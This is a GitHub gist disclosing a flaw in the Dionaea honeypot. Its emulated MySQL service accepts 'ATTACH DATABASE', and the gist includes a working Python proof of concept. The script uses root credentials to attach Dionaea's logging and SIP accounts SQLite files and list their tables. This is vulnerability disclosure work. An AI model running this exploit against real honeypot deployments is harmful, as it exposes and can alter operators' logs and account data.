Created
November 19, 2019 15:25
-
-
Save ykoster/538a349b08ae528ac018aa74bd2f853e to your computer and use it in GitHub Desktop.
Dionaea honeypot allows the "ATTACH DATABASE" command, which can be used to attach to any local SQLite database on which the Dionaea process has read access. If Dionaea has write access, it is even possible to make changes to the database. This includes the logging database (when used) and sipaccounts database.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import MySQLdb | |
| host = '127.0.0.1' | |
| port = 3306 | |
| user = 'root' | |
| passwd = 'passwd' | |
| dbs = ['/opt/dionaea/var/lib/dionaea/dionaea.sqlite', '/opt/dionaea/var/lib/dionaea/sip/accounts.sqlite'] | |
| conn = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd) | |
| print(f'[\u001b[32m+\u001b[0m] Connected to {host}:{port}') | |
| i = 0 | |
| for db in dbs: | |
| cur = conn.cursor() | |
| try: | |
| cur.execute(f"ATTACH DATABASE '{db}' AS db{i}") | |
| print(f'[\u001b[32m+\u001b[0m] Attached to database: {db}') | |
| print(f'[\u001b[32m+\u001b[0m] Dumping table names:') | |
| cur.execute(f"SELECT name FROM db{i}.sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%'") | |
| for row in cur.fetchall(): | |
| print(f'[-] {row[0]}') | |
| i += 1 | |
| finally: | |
| cur.close() | |
| conn.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment